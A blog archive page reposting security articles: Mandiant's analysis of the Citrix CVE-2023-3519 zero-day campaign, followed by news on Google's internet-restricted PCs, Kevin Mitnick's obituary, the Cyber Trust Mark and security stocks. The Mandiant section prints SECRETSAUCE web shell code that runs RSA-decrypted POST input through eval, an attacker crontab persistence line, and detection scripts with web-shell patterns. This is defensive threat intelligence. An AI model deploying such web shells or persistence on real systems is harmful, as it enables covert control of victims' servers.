Category Archives: Internet Security

Exploitation of Citrix Zero-Day by Possible Espionage Actors (CVE … – Mandiant

Note: This is a developing campaign under active analysis. We will continue to add more indicators, hunting tips, and information to this blog post as needed.

Security and networking devices are "edge devices," meaning they are connected directly to the internet. If an attacker succeeds in exploiting a vulnerability on one of these appliances, they gain initial access without any human interaction, which reduces the chances of detection. As long as the exploit remains undiscovered, the threat actor can reuse it to gain access to additional victims or to reestablish access to targeted systems. Additionally, both edge devices and virtualization software are difficult to monitor and may not support endpoint detection and response (EDR) solutions or methods to detect modifications or collect forensic images, which further reduces the likelihood of detection and complicates attribution. Notably, since at least 2021, cyber espionage threat actors have focused on edge devices, particularly security, networking, and virtualization technologies, to gain persistent access to victim networks while evading detection.

On July 18, Citrix released security bulletin CTX561482, which described vulnerabilities in Citrix NetScaler Application Delivery Controller (ADC) and Citrix NetScaler Gateway. One of the vulnerabilities, CVE-2023-3519, could allow an unauthenticated remote attacker to perform arbitrary code execution. This vulnerability was assigned a CVSS score of 9.8. Citrix has stated that it has observed exploitation of this vulnerability in the wild. Mandiant is actively involved in investigations involving recently compromised ADC appliances that were fully patched prior to the July 18 patches addressing CVE-2023-3519. Predominantly used in the information technology industry, ADCs are a vital component of enterprise and cloud data centers, ensuring the continuous improvement of the availability, security, and performance of applications. ADCs provide functions that optimize the delivery of enterprise applications across the network.

Mandiant strongly recommends that organizations follow Citrix's advice to patch vulnerable appliances as soon as possible. Mandiant classifies CVE-2023-3519 as a high-risk vulnerability because it allows for remote code execution without any known offsets. While this vulnerability has been exploited in the wild, the exploit code is not yet publicly available. Mandiant recommends that organizations prioritize patching this vulnerability.

During analysis of the compromised appliance, Mandiant identified a simple PHP eval web shell located in /var/vpn/themes. The web shell had the earliest file system modified time of all the identified malware and was relatively compact (113 bytes). As a result, Mandiant assessed with moderate confidence that the web shell was placed on the system as part of the initial exploitation vector.

The threat actor used the web shell to modify the NetScaler configuration. In particular, they attempted to deactivate the NetScaler High Availability File Sync daemon (nsfsyncd). Additionally, the threat actor attempted to remove processes from the Citrix Monitor configuration within the file /etc/monitrc before finally killing the Monitor process. Shortly thereafter, various NetScaler logs recorded a critical failure, which resulted in the creation of a NetScaler Packet Processing Engine (NPPE) core dump three minutes after the exploitation attempt and the appliance restart. Mandiant analyzed this dump file and identified strings related to HTTP requests that occurred at the same time as the creation of the first web shell.

Based on code similarities, specifically the structure of the commands, Mandiant has high confidence these samples are related to exploitation of CVE-2023-3519. At the time of writing, there is no public proof of concept code for this vulnerability. To avoid potentially leaking details of how to exploit the vulnerability to other threat actors, Mandiant will not detail how the vulnerability was exploited. Some examples that follow may support triage when dealing with this activity. For example, within one POST request the threat actor took a number of actions:

The sequence of commands, as extracted from the request, is as follows (note that in log files and crash dumps some characters may be URL encoded).

Mandiant identified additional web shells and malicious ELF files that the threat actor uploaded to the vulnerable appliance after initial exploitation. All of the web shells were observed in the /var/vpn/themes directory; however, there is no reason the threat actor could not create web shells in other public-facing directories. Mandiant observed two types of web shells:

Details on these web shells are included in the following section.

Moreover, the threat actor also installed a persistent tunneler on the appliance with the filename `the`. The tunneler provided encrypted reverse TCP/TLS connections to a hard-coded command-and-control address. The tunneler was derived from the open-source ligolo-ng GitHub project. Mandiant believes the hard-coded address is victim specific. The attacker created a crontab entry for the `nobody` user to ensure the tunneler ran persistently.

30 02 * * * nohup /var/tmp/the &

The threat actor copied an additional tunneler, version 0.26.10 of the open-source NPS project, to the compromised appliance with the filename `npc`. NPS is a fully featured tunneler written in Go. It can be configured from the command line or with a configuration file. The tunneler also has the ability to instantiate a local file server, allowing the remote user to download files from the system.

Mandiant identified six unique web shells on an impacted Netscaler. These included:

The initial web shell identified on the impacted Netscaler was an eval web shell, info.php. The contents of info.php can be seen as follows:

The web shells prod.php, log.php, vpn.php, and logout.php are part of the SECRETSAUCE family of web shells. These web shells are nearly identical, with the exception of the embedded RSA public key. SECRETSAUCE is a PHP web shell that receives commands via POST parameters and executes them on the device. The shell contains a hard-coded RSA public key that is used to decrypt the provided POST parameters before passing them to PHP's built-in eval function.

The code comprising the primary functionality of prod.php is included as follows:

```php
class rsa {
    public $key;
    public $a;
    public $cmd;

    // Returns the embedded RSA public key. The key material that followed
    // the heredoc operator is omitted from this excerpt.
    public function keys() {
        $this->key = <<
        return $this->key;
    }

    // Executes the decrypted command string with PHP's eval, suppressing errors.
    public function run($a = NULL) {
        return @eval($a);
    }

    // Splits POST parameter 1 on "|", base64-decodes each chunk, and passes
    // it through the function named in $qs (openssl_public_decrypt) with the
    // embedded public key; the concatenated output is the command to run.
    public function get($qs) {
        $this->cmd = $_POST[1];
        $cmds = explode("|", $this->cmd);
        $pk = openssl_pkey_get_public(rsa::keys());
        $this->cmd = '';
        foreach ($cmds as $value) {
            if ($qs(rsa::decode($value), $de, $pk)) {
                $this->cmd .= $de;
            }
        }
        return $this->cmd;
    }

    public function decode($e = NULL) {
        return base64_decode($e);
    }
}

$z = new rsa();
$z->run($z->get('openssl_public_decrypt'));
```

The final web shell, config.php, was identified as a sample of REGEORG.NEO. REGEORG.NEO is a publicly available web shell and web shell generation tool intended as an improvement to the REGEORG project. REGEORG is a Python utility and collection of web shells that, when used together, establish a SOCKS proxy on the system where the web shell was placed. Threat actors use REGEORG to tunnel activities from their systems into compromised networks.

Given the scope and sophistication of this threat actor, Mandiant recommends that organizations rebuild any appliances that have been exploited. The ADC upgrade process overwrites some, but not all, of the directories where threat actors may create web shells, potentially leaving the appliance in a compromised state.

Organizations should evaluate whether their ADC or Gateway appliance management ports require unrestricted Internet access. Limiting the Internet access to only necessary IP addresses (such as Citrix related addresses) would make post-exploitation activities of this and any future vulnerabilities more difficult.

Additionally, Mandiant has observed the threat actor copying the ADC ns.conf file as well as keys stored on the file system that are used to encrypt secrets within the configuration file. Public tooling exists to decrypt the ns.conf secrets, although Mandiant has not validated that it works for the most recent appliance versions. Given these TTPs, Mandiant recommends that impacted organizations rotate all secrets stored in the configuration file as well as any private keys and certificates that may be used for TLS connections.

Mandiant recommends hardening susceptible accounts in the domain to reduce the likelihood of credential exposure via Kerberoasting and to limit a potential threat actor's ability to obtain credentials for lateral movement throughout the environment.

Mandiant recommends organizations use available logs and Endpoint Detection & Response (EDR) telemetry to hunt for authentication attempts sourced from Netscaler management addresses (NSIPs) to all endpoints in the environment. Mandiant observed authentication attempts by the threat actor sourced from NSIPs of impacted Netscalers both via Remote Desktop Protocol (RDP) logons and network logons to endpoints within the victim's environment. Additional information recorded in these events may capture both hostnames and IP addresses belonging to attacker infrastructure to further pivot and hunt for in the environment. It is unexpected and suspicious to observe traffic to the internal network and miscellaneous (non-Citrix) Internet IP addresses from the NSIP of an appliance. Rotate credentials for any impacted/targeted accounts identified in these attempts.

Review relevant firewall logs for any network-based indicators identified. Additionally, Mandiant observed the string `pwd;pwd;pwd;pwd;pwd;` used within the exploit POST requests, which can aid hunting. Also, prior to upload of the initial web shell, Mandiant identified requests by a Headless Chrome User Agent (executed via CLI), included as follows:

Furthermore, Mandiant recommends review of HTTP error logs for potential crashes, which can be indicative of vulnerability exploitation.
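To turn the two hunting leads above (logons sourced from NSIPs, and the `pwd;pwd;pwd;pwd;pwd;` marker plus the headless Chrome user agent in HTTP request data) into something runnable, here is an added example; it is not code from Mandiant's post. It checks constructed Windows logon records against an assumed set of NSIPs, and scans constructed Apache-style access-log lines after URL-decoding the request line, since the report notes the marker may appear encoded in logs and dumps. The addresses, hostnames, the request path, the parameter name and the assumption that the NetScaler `httpaccess.log` follows Apache combined format are all placeholders, not indicators from the report.

```python
"""Hunting helpers for the two log sources described above (added example).

1. Windows logon events: flag authentication attempts whose source address
   is a NetScaler management IP (NSIP); RDP (logon type 10) and network
   (type 3) logons from an NSIP are the pattern described in the post.
2. HTTP request text: flag the "pwd;pwd;pwd;pwd;pwd;" marker (after URL
   decoding) and HeadlessChrome user agents.
All records below are constructed for the example.
"""
import re
from urllib.parse import unquote

MARKER = "pwd;pwd;pwd;pwd;pwd;"
INTERESTING_LOGON_TYPES = {"3": "network", "10": "RDP"}

# Assumed NSIPs of the appliances under review (placeholders).
NSIPS = {"10.0.0.10", "10.0.0.11"}

# Constructed logon records shaped like fields parsed from Windows events 4624/4625:
# (event id, target host, account, logon type, source IP, source workstation)
LOGON_EVENTS = [
    ("4624", "FILESRV01", "CORP\\svc_backup", "3", "10.0.0.10", "-"),
    ("4625", "DC01", "CORP\\jdoe", "10", "10.0.0.11", "UNKNOWN-WS"),
    ("4624", "DC01", "CORP\\jdoe", "10", "10.0.5.23", "JDOE-LAPTOP"),
    ("4624", "FILESRV01", "CORP\\mary", "2", "-", "FILESRV01"),
]


def logons_from_nsips(events, nsips):
    """Return logon events sourced from an NSIP, with the logon kind spelled out."""
    hits = []
    for event_id, host, account, logon_type, src_ip, workstation in events:
        if src_ip not in nsips:
            continue
        kind = INTERESTING_LOGON_TYPES.get(logon_type, "other")
        hits.append({"event_id": event_id, "host": host, "account": account,
                     "kind": kind, "src_ip": src_ip, "workstation": workstation})
    return hits


def contains_marker(text):
    """True if the exploit marker appears in text, whether URL-encoded or not."""
    return MARKER in unquote(text)


# Apache combined format; the NetScaler httpaccess.log is assumed to be compatible.
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$')

# Constructed access-log lines; the path and parameter name are placeholders.
SAMPLE_ACCESS_LOG = [
    '198.51.100.7 - - [15/Jul/2023:04:12:01 +0000] "GET /vpn/index.html HTTP/1.1" 200 2315 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/114.0.0.0 Safari/537.36"',
    '198.51.100.7 - - [15/Jul/2023:04:13:44 +0000] "POST /PLACEHOLDER_PATH?x=pwd%3Bpwd%3Bpwd%3Bpwd%3Bpwd%3B HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Jul/2023:04:15:09 +0000] "GET /vpn/themes/default.css HTTP/1.1" 200 9001 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/115.0"',
]


def hunt_http(lines):
    """Return (line number, reasons) for access-log lines matching either indicator."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = []
        if m["request"].startswith("POST") and contains_marker(m["request"]):
            reasons.append("pwd marker in POST request")
        if "HeadlessChrome" in m["agent"]:
            reasons.append("headless Chrome user agent")
        if reasons:
            findings.append((n, reasons))
    return findings


if __name__ == "__main__":
    for hit in logons_from_nsips(LOGON_EVENTS, NSIPS):
        print("logon from NSIP:", hit)
    for n, reasons in hunt_http(SAMPLE_ACCESS_LOG):
        print(f"access log line {n}: {', '.join(reasons)}")
```

Access logs only carry the request line, not POST bodies, so `contains_marker` is written to take any text: the same check can be run over strings extracted from an NSPPE core dump, where the post says the request content was recovered.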

Mandiant observed LDAP queries sourced from NSIPs of impacted Netscalers in an attempt to identify accounts vulnerable to Kerberoasting. A sample query can be seen as follows:

Mandiant recommends review of the following directories and subdirectories for the presence of web shells:

In order to identify malicious ELF binaries, Mandiant recommends review of the /tmp/ directory. Similarly, review of files with timestamps after the NetScaler was last patched is especially important.

In review of NSPPE (NetScaler Packet Processing Engine) core dumps, Mandiant identified commands executed by the threat actor to redirect the contents of ns.conf, F1.key, and F2.key to a renamed JavaScript file for exfiltration. Mandiant recommends reviewing relevant NSPPE core dumps in the /core/ directory in order to identify similar activity. Rotation of the keys is recommended if similar activity is observed in NSPPE core dumps.

Finally, Mandiant recommends review of /var/crontabs/nobody for scheduled execution of suspicious binaries. Mandiant identified a crontab entry for the aforementioned ELF tunneler, `the`.
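The review steps above, together with the SECRETSAUCE traits described earlier (base64-decoded POST data passed through openssl_public_decrypt into eval), can be scripted. The following is an added example, not code from Mandiant or Citrix: it scans directories for PHP files carrying those traits, for ELF binaries (by magic bytes), and for files modified after an assumed last-patch date, and it parses a crontab for entries that launch something from /tmp or /var/tmp. The directory roots, the patch date and the sample files are constructed here so the script runs offline; on an appliance the roots would be /var/vpn/themes, /tmp and /var/tmp, and the crontab /var/crontabs/nobody.

```python
"""Triage helper for the NetScaler review steps above (added example).

Reports PHP files with eval/SECRETSAUCE web shell traits, ELF binaries,
files modified after the last patch, and crontab lines running from temp
directories. build_sample_tree() constructs a throwaway directory so the
script can be run without an appliance.
"""
import os
import re
import tempfile
import time
from datetime import datetime

ELF_MAGIC = b"\x7fELF"
TEMP_DIRS = ("/tmp/", "/var/tmp/")
TRAIT_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "request_input": re.compile(r"\$_(POST|GET|REQUEST)\b"),
    "rsa_public_decrypt": re.compile(r"\bopenssl_public_decrypt\b"),
    "base64_decode": re.compile(r"\bbase64_decode\b"),
}


def php_traits(path):
    """Names of the web shell traits present in a PHP source file, sorted."""
    try:
        with open(path, "r", errors="replace") as fh:
            src = fh.read()
    except OSError:
        return []
    return sorted(n for n, rx in TRAIT_PATTERNS.items() if rx.search(src))


def looks_like_web_shell(traits):
    # eval() alone occurs in legitimate PHP; require it to be fed from request
    # input (plain eval shell) or from an RSA-decrypted blob (SECRETSAUCE).
    return "eval" in traits and ("request_input" in traits or "rsa_public_decrypt" in traits)


def is_elf(path):
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == ELF_MAGIC
    except OSError:
        return False


def scan_dirs(roots, last_patched):
    """Return {path: [reasons]} for files under roots that deserve a closer look."""
    cutoff = last_patched.timestamp()
    findings = {}
    for root in roots:
        for dirpath, _, names in os.walk(root):
            for name in names:
                path = os.path.join(dirpath, name)
                reasons = []
                if name.lower().endswith(".php"):
                    traits = php_traits(path)
                    if looks_like_web_shell(traits):
                        reasons.append("web shell traits: " + ", ".join(traits))
                if is_elf(path):
                    reasons.append("ELF binary")
                if os.path.getmtime(path) > cutoff:
                    reasons.append("modified after last patch")
                if reasons:
                    findings[path] = reasons
    return findings


def suspicious_cron_lines(crontab_text):
    """Crontab entries (five time fields, then a command) whose command runs from a temp dir."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) == 6 and any(t in fields[5] for t in TEMP_DIRS):
            hits.append(line)
    return hits


def build_sample_tree():
    """Construct a throwaway tree: an old benign theme file, a PHP file mimicking the SECRETSAUCE call pattern, and an ELF stub."""
    root = tempfile.mkdtemp(prefix="ns-triage-")
    themes = os.path.join(root, "themes")
    os.makedirs(themes)
    with open(os.path.join(themes, "default.php"), "w") as fh:
        fh.write("<?php echo 'theme'; ?>\n")
    with open(os.path.join(themes, "prod.php"), "w") as fh:  # constructed sample, not functional
        fh.write("<?php $c=$_POST[1]; openssl_public_decrypt(base64_decode($c), $d, $pk); @eval($d); ?>\n")
    with open(os.path.join(root, "npc"), "wb") as fh:
        fh.write(ELF_MAGIC + b"\0" * 12)
    old = time.time() - 30 * 86400
    os.utime(os.path.join(themes, "default.php"), (old, old))  # predates the assumed patch
    return root


def run_sample():
    """Scan the sample tree against an assumed patch date one week ago; keyed by file name."""
    root = build_sample_tree()
    patched = datetime.fromtimestamp(time.time() - 7 * 86400)
    return {os.path.basename(p): r for p, r in scan_dirs([root], patched).items()}


# Constructed crontab text; the first line mirrors the entry quoted in the post.
SAMPLE_CRONTAB = "30 02 * * * nohup /var/tmp/the &\n0 1 * * * /usr/bin/find /var/log -mtime +7 -delete\n"

if __name__ == "__main__":
    for name, reasons in run_sample().items():
        print(name, "->", "; ".join(reasons))
    print(suspicious_cron_lines(SAMPLE_CRONTAB))
```

The trait check is deliberately conservative: `eval(` on its own is not reported, because theme and template code can use it legitimately, and the mtime check is only as good as the patch date you supply, so take it from the appliance's own upgrade history rather than guessing.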

Mandiant cannot attribute this activity based on the evidence collected thus far; however, this type of activity is consistent with previous operations by China-nexus actors, based on known capabilities and actions against Citrix ADCs in 2022. The China-nexus cyber threat landscape has evolved to such an extent that its ecosystem now more closely mirrors that of financial crime clusters, where connections and code overlap do not necessarily offer a comprehensive picture. Additionally, Mandiant has observed that a preponderance of the actors using the combination of NPS proxy and REGEORG.NEO have a China nexus.

Media reports indicate APT5 exploited a zero-day vulnerability in Citrix ADC and Gateway devices allowing pre-authenticated remote code execution on vulnerable devices. Following that exploitation, the National Security Agency (NSA) published a report detailing APT5 capabilities against Citrix ADCs. In the report, NSA states that targeting Citrix ADCs can facilitate illegitimate access to targeted organizations by bypassing normal authentication controls. NSA, in collaboration with partners, developed threat hunting guidance to provide steps organizations can take to look for possible artifacts of this type of activity.

Mandiant tracks additional Chinese cyber espionage threat actors using botnets to obfuscate traffic between attackers and victim networks, including APT41, APT31, APT15, TEMP.Hex, and Volt Typhoon. Cyber espionage threat actors continue to target technologies that do not support endpoint detection and response (EDR) solutions such as firewalls, IoT devices, hypervisors and VPN technologies (e.g. Fortinet, SonicWall, Pulse Secure, and others). Mandiant has investigated dozens of intrusions at defense industrial base (DIB), government, technology, and telecommunications organizations over the years where suspected China-nexus groups have exploited zero-day vulnerabilities and deployed custom malware to steal user credentials and maintain long-term access to the victim environments.

See the original post:
Exploitation of Citrix Zero-Day by Possible Espionage Actors (CVE ... - Mandiant

Google restricting internet access to some employees to reduce cyberattack risk – CNBC


Google on Wednesday is starting a new pilot program where some employees will be restricted to internet-free desktop PCs, CNBC has learned.

The company originally selected more than 2,500 employees to participate, but after receiving feedback, the company revised the pilot to allow employees to opt out, as well as opening it up to volunteers. The company will disable internet access on the select desktops, with the exception of internal web-based tools and Google-owned websites like Google Drive and Gmail. Some workers who need the internet to do their job will get exceptions, the company stated in materials.

In addition, some employees will have no root access, meaning they won't be able to run administrative commands or do things like install software.

Google is running the program to reduce the risk of cyberattacks, according to internal materials. "Googlers are frequent targets of attacks," one internal description viewed by CNBC stated. If a Google employee's device is compromised, the attackers may have access to user data and infrastructure code, which could result in a major incident and undermine user trust, the description added.

Turning off most internet access ensures attackers cannot easily run arbitrary code remotely or grab data, the description explained.

The program comes as companies face increasingly sophisticated cyberattacks. Last week, Microsoft said Chinese intelligence hacked into company email accounts belonging to two dozen government agencies, including the State Department, in the U.S. and Western Europe in a "significant" breach. Google has been pursuing U.S. government contracts since launching a public sector division last year.

It also comes as Google, which is preparing a companywide rollout of various artificial intelligence tools, tries to boost its security. The company has also in recent months been striving harder to contain leaks.

"Ensuring the safety of our products and users is one of our top priorities," a Google spokesperson said in an emailed statement. "We routinely explore ways to strengthen our internal systems against malicious attacks."

Continued here:
Google restricting internet access to some employees to reduce cyberattack risk - CNBC

Kevin Mitnick, Hacker Who Eluded Authorities, Is Dead at 59 – The New York Times

Kevin Mitnick, who at the dawn of widespread internet usage in the mid-1990s became the nation's archetypal computer hacker, obsessive but clever, shy but mischievous and threatening to an uncertain degree, and who later used his skills to become chief hacking officer of a cybersecurity firm, died on Sunday in Pittsburgh. He was 59.

Kathy Wattman, a spokeswoman for the cybersecurity company he partly owned, KnowBe4, said the cause was pancreatic cancer.

Described by The New York Times in 1995 as "the nation's most wanted computer outlaw," Mr. Mitnick was a fugitive for more than two years.

He was sought for gaining illegal access to about 20,000 credit card numbers, including some belonging to Silicon Valley moguls; causing millions of dollars in damage to corporate computer operations; and stealing software used for maintaining the privacy of wireless calls and handling billing information.

Ultimately, he was caught and spent five years in prison. Yet no evidence emerged that Mr. Mitnick used the files he had stolen for financial gain. He would later defend his activities as a high stakes but, in the end, harmless form of play.

"Anyone who loves to play chess knows that it's enough to defeat your opponent," he wrote in a 2011 memoir, "Ghost in the Wires." "You don't have to loot his kingdom or seize his assets to make it worthwhile."

At the time of Mr. Mitnick's capture, in February 1995, the computer age was still young; Windows 95 had not yet been released. The Mitnick Affair drove a fretful international conversation not just about hacking, but also about the internet itself.

"As a media celebrity, the internet is now seriously overexposed," the Times columnist Frank Rich complained in March 1995, blaming the hoopla surrounding Mr. Mitnick.

Mr. Mitnick's most spectacular crimes were his attempts to evade capture by the authorities. In 1993, he gained control of phone systems in California that enabled him to wiretap the F.B.I. agents pursuing him and confuse their efforts to track him. At one point they raided what they thought was Mr. Mitnick's home, only to find there a Middle Eastern immigrant watching TV.

On another occasion, using a radio scanner and software, Mr. Mitnick discovered that F.B.I. agents were closing in on him. He fled his apartment, and when the authorities arrived, they found a box of doughnuts waiting for them.

Mr. Mitnick ran into trouble on Christmas Day 1994, when he stole emails from a fellow hacker named Tsutomu Shimomura and taunted him. When he learned of the attack, Mr. Shimomura suspended a cross-country ski trip he was on and volunteered to help track down Mr. Mitnick.

What The Times called "a duel on the net" ensued. Mr. Mitnick was "the amoral savant," praising the tech skills of his adversary, while Mr. Shimomura was "the freelance gunslinger with a conscience," accusing Mr. Mitnick of violating the codes of the online community.

"This kind of behavior is unacceptable," he told The Times.

Mr. Shimomura, using software he had designed that reconstructed a user's computer sessions, along with cellphone scanning equipment, proceeded to locate Mr. Mitnick.

Mr. Mitnick was finally captured by the F.B.I. and charged with the illegal use of a telephone access device and computer fraud. "He allegedly had access to corporate trade secrets worth millions of dollars," Kent Walker, an assistant U.S. attorney in San Francisco, said at the time. "He was a very big threat."

In 1998, while Mr. Mitnick awaited sentencing, a group of supporters commandeered The Times's website for several hours, forcing it to shut down. A Times technology reporter, John Markoff, also became part of the imbroglio, reporting soon after the arrest that Mr. Mitnick had gained access to Mr. Markoff's email as revenge for Mr. Markoff's reporting on his activities.

Mr. Mitnick reached plea agreements in 1996 and 1999, which included pleading guilty to computer and wire fraud. He was released from prison in 2000 on the condition that he refrain from using a computer or cellphone for three years without the permission of his probation officer.

After leaving prison, Mr. Mitnick read out a statement of self-defense. "My crimes were simple crimes of trespass," he said. "My case is a case of curiosity."

Kevin David Mitnick was born in the Van Nuys section of Los Angeles on Aug. 6, 1963, and grew up in that city. His parents, Alan Mitnick and Shelly Jaffee, divorced when he was 3 years old, and he was raised by his mother, a waitress.

Mr. Mitnick was a heavyset and lonely boy who, by the age of 12, had figured out how to freely ride the bus using a $15 punch card and blank tickets fished from a dumpster. In high school he developed an obsession with the inner workings of the switches and circuits of telephone companies. He pulled pranks at a high level, managing to program the home phone of someone he did not like so that each time the line was answered, a recording asked for a deposit of 25 cents.

He showed a willingness to violate the law flagrantly, breaking into a Pacific Bell office as a teenager and stealing technical manuals.

In the late 1980s, he was convicted twice of hacking into corporate computer systems, leading to time in prison and counseling for addiction to computers.

Yet Mr. Mitnick often took a surprisingly old-fashioned approach to high-tech thievery. He frequently impersonated authority figures over the phone and in email, persuading low-level company officials to hand over passwords that gave him access to secret information.

Mr. Mitnick's first marriage, in his early 20s, ended quickly in divorce. In 2015, he met Kimberly Barry at a cybersecurity conference in Singapore, and the two soon began dating. They married last year, after he learned of his cancer diagnosis. She survives him and is pregnant with his first child.

The year Mr. Mitnick was released, The Times reported on an unusual arrangement in which he was hired by a California college he had victimized to consult on cybersecurity. Mr. Mitnick called it "hire the hacker."

Now it is commonplace for hackers to find work by exposing the vulnerabilities of governments and corporations. KnowBe4, the company Mr. Mitnick partly owned, describes itself as the provider of the world's largest security awareness training. The company says that a cybersecurity training curriculum that Mr. Mitnick designed is used by more than 60,000 organizations.

Writing in The New York Times Book Review about data privacy, the journalist and author Amy Webb in 2017 identified that once-hunted hacker with an epithet that would have baffled members of law enforcement and newspaper readers in the 1990s: "the internet security expert Kevin Mitnick."

Livia Albeck-Ripka and Orlando Mayorquin contributed reporting.

Link:
Kevin Mitnick, Hacker Who Eluded Authorities, Is Dead at 59 - The New York Times

US government launches the Cyber Trust Mark, its long-awaited IoT security labeling program – TechCrunch


The Biden administration has launched its long-awaited Internet of Things (IoT) cybersecurity labeling program that aims to protect Americans against the myriad security risks associated with internet-connected devices.

The program, officially named the U.S. Cyber Trust Mark, aims to help Americans ensure they are buying internet-connected devices that include strong cybersecurity protections against cyberattacks.

The Internet of Things, a term encompassing everything from fitness trackers and routers to baby monitors and smart refrigerators, has long been considered a weak cybersecurity link. Many devices ship with easy-to-guess default passwords and lack regular security updates, putting consumers at risk of being hacked.

The Biden administration says its voluntary Energy Star-influenced labeling system will raise the bar for IoT security by enabling Americans to make informed decisions about the security credentials of the internet-connected devices they buy. The U.S. Cyber Trust Mark will take the form of a distinct shield logo, which will appear on products that meet established cybersecurity criteria.

These criteria, established by the National Institute of Standards and Technology (NIST), will require, for example, that devices use unique and strong default passwords, protect both stored and transmitted data, offer regular security updates and ship with incident detection capabilities.

The full list of standards is not yet finalized. The White House said that NIST will immediately start work on defining cybersecurity standards for higher-risk consumer-grade routers, devices that attackers frequently target to steal passwords and create botnets that can be used to launch distributed denial-of-service (DDoS) attacks. This work will be completed by the end of 2023, with the aim that the initiative will cover these devices when it launches in 2024.

In a call with reporters, the White House confirmed that the Cyber Trust Mark will also include a QR code that will link to a national registry of certified devices and provide up-to-date security information, such as software updating policies, data encryption standards and vulnerability remediation.

"We knew that we didn't want to create a label that said this product had been certified and secured and then stayed secure forever," a senior administration official said. "The QR code will give you up-to-date information on the ongoing adherence to cyber security standards."

U.S. retailers will also be encouraged to prioritize labeled products when placing them in stores and online, the White House said, and a number have already signed up to the initiative, including Amazon and Best Buy. Other big-name tech firms that have already agreed to the voluntary labeling initiative include Cisco, Google, LG, Qualcomm and Samsung.

While the initiative will initially focus on high-risk consumer devices, the U.S. Department of Energy announced on Tuesday that it is working with industry partners to develop cybersecurity labeling requirements for smart meters and power inverters.

See more here:
US government launches the Cyber Trust Mark, its long-awaited IoT security labeling program - TechCrunch

Continual Improvement Is The Key To Optimum Cyber Security – CIO Applications

Eric Lovell, Senior Director, It/Cyber Security Risk, Ally

And from a risk perspective (with few exceptions), cyber security relevant information technology aligned metrics are at the top of the mind for boards, end users, and every stakeholder group.

I would hazard to guess that at any organization, cyber security metrics of some type are being collected, tracked, and communicated. Some organizations have robust, well managed programs; others may take a minimalist approach, only tracking a handful of items because leadership demands accountability for basic things with direct and obvious business impact.

In regulated industries, such as financial services, there is an expectation that their entire digital presence should be secure and well managed. For many firms, the identification, collection, tracking, and reporting of metrics, rather than an ancillary process, is a fundamental organizational capability with measurable value for all stakeholders.

In my experience, even a cursory review of industry-specific regulatory, academic, and authoritative cyber security standards and/or research products produced by organizations such as the Center for Internet Security and the National Institute of Standards and Technology shows that a mature cyber risk management metrics program has the following characteristics:

1. Both retrospective and prospective/actionable

2. Comprehensive in scope but limited in number

3. Clear, concise, and of adequate frequency to provide expected benefits

4. Authoritative, both internally and externally

The rest is here:
Continual Improvement Is The Key To Optimum Cyber Security - CIO Applications

3 Top Stocks From the Flourishing Security and Safety Services Industry – Yahoo Finance

The Zacks Security and Safety Services industry is poised to benefit from strong demand for security and safety solutions, prompted by growing concerns about terrorist and criminal activities and the need to safeguard citizens and infrastructure. Improving supply chains and a deceleration in inflation augur well for the industry's near-term prospects.

Companies like Johnson Controls International JCI, Brady Corporation BRC and Lakeland Industries LAKE are poised to take advantage of the buoyancy in the industry.

About the Industry

The Zacks Security and Safety Services industry comprises companies that provide sophisticated and interactive security solutions and related services, which are meant to be used for residential, commercial and institutional purposes. A few industry players develop electrical weapons for personal defense, as well as military, federal, law enforcement and private security. Some of them provide solutions for the recovery of stolen vehicles, wireless communication devices, equipment for the safety of facility infrastructure and employees, and products for detecting hazards. A few companies provide a variety of services to automobile owners and insurance companies. The industry serves customers belonging to various end markets, including manufacturing, electronics, hospitality, education, construction, telecommunications, aerospace and medical.

3 Trends Shaping the Future of the Security and Safety Services Industry

Demand for Security and Safety Services: Growing concerns of terrorism and criminal activities around the world are promoting demand for security and safety services. Political unrest across countries, prompting governments to safeguard citizens and protect infrastructure, acts as a key growth driver for the industry. With growing urbanization, governments are increasingly focusing on the safety and security of people, assets and the like, thus driving demand in the industry. Thanks to rising instances of hacking, the industry is seeing growing demand for Internet security products and services like firewalls and unified threat management. Increasing efforts directed toward ensuring safe infrastructure in smart cities bode well for the industry.

Improving Supply Chains: While supply chain disruptions persist, the situation has improved significantly, as evident from the Institute for Supply Management report's Supplier Deliveries Index, which reflected faster deliveries for the eighth straight month in June. This is expected to drive the industry's growth in 2023. A reduction in raw material costs, thanks to the deceleration in inflation, should support the bottom line of industry players.

High Debt Levels: To stay competitive and keep up with changing customer needs, industry players constantly focus on upgrading and developing new products. While this augurs well for the industry's long-term growth, hefty investments in research and development often leave companies with highly leveraged balance sheets.


Zacks Industry Rank Indicates Bright Prospects

The Zacks Security and Safety Services industry, housed within the broader Industrial Products sector, currently carries a Zacks Industry Rank #67. This rank places it in the top 27% of more than 250 Zacks industries.

The group's Zacks Industry Rank, which is basically the average of the Zacks Rank of all the member stocks, indicates solid near-term prospects. Our research shows that the top 50% of the Zacks-ranked industries outperforms the bottom 50% by a factor of more than two to one.

The industry's positioning in the top 50% of the Zacks-ranked industries is a result of the positive earnings outlook for the constituent companies in aggregate. The Zacks Consensus Estimate for the group's 2023 earnings per share has increased 8.5% in the past year.

Given the bullish near-term prospects of the industry, we will present a few stocks that you may want to consider for your portfolio. But it is worth taking a look at the industry's shareholder returns and its current valuation first.

Industry Outperforms Sector & S&P 500

The Zacks Security and Safety Services industry has outperformed both the broader sector and the Zacks S&P 500 composite index over the past year.

Over this period, the industry has rallied 25.4% compared with the sector and the S&P 500 Index's increase of 21.4% and 13.9%, respectively.

Industry's Current Valuation

On the basis of forward P/E (F12M), which is a commonly used multiple for valuing security and safety services stocks, the industry is currently trading at 19.52X compared with the S&P 500's 20.10X. However, it exceeds the sector's P/E (F12M) ratio of 17.11X.

Over the past five years, the industry has traded as high as 27.04X, as low as 10.38X and at the median of 18.68X, as the chart below shows:

3 Security and Safety Services Stocks to Buy

